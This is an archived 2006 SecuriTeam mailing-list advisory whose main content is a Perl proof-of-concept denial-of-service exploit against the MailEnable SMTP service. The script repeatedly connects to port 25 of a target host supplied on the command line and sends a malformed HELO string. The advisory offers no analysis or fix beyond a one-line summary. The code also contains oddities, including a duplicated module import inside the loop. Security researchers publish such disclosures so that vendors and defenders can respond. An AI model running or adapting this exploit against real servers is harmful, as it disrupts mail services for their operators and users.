[EXPL] Mailenable SMTP Service DoS PoC
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 28 Jun 2006 15:05:24 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mailenable SMTP Service DoS PoC
------------------------------------------------------------------------
SUMMARY
" <http://www.mailenable.com/> MailEnable's mail server software provides
a powerful, scalable hosted messaging platform for Microsoft Windows."
Improper handling of user input allows attackers to DoS MailEnable.
DETAILS
Exploit:
#!/usr/bin/perl -w
#
# Mailenable SMTP DoS exploit
# 24/06/2006
#
# Filbert at divisionbyzero dot be
#
use Net::Telnet;
$string = "\0x99";
for ($count = 1; $count <= 10; $count++)
{
$telnet = new Net::Telnet ( Timeout=>60, Errmode=>'return',Port=>'25');
$telnet->open($ARGV[0]);use Net::Telnet;
$telnet->print("helo ", $string, "\n");
}
#EoF
ADDITIONAL INFORMATION
The information has been provided by
<mailto:divisionbyzerodotbe@xxxxxxxxx> db0.
The original article can be found at:
<http://www.divisionbyzero.be/?p=174> http://www.divisionbyzero.be/?p=174
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] Excel 2003 Hlink Stack SEH Overflow (Exploit)
- Next by Date: [NEWS] Cisco Web-Browser Interface Vulnerability
- Previous by thread: [EXPL] Excel 2003 Hlink Stack SEH Overflow (Exploit)
- Next by thread: [NEWS] Cisco Web-Browser Interface Vulnerability
- Index(es):
Relevant Pages
|
|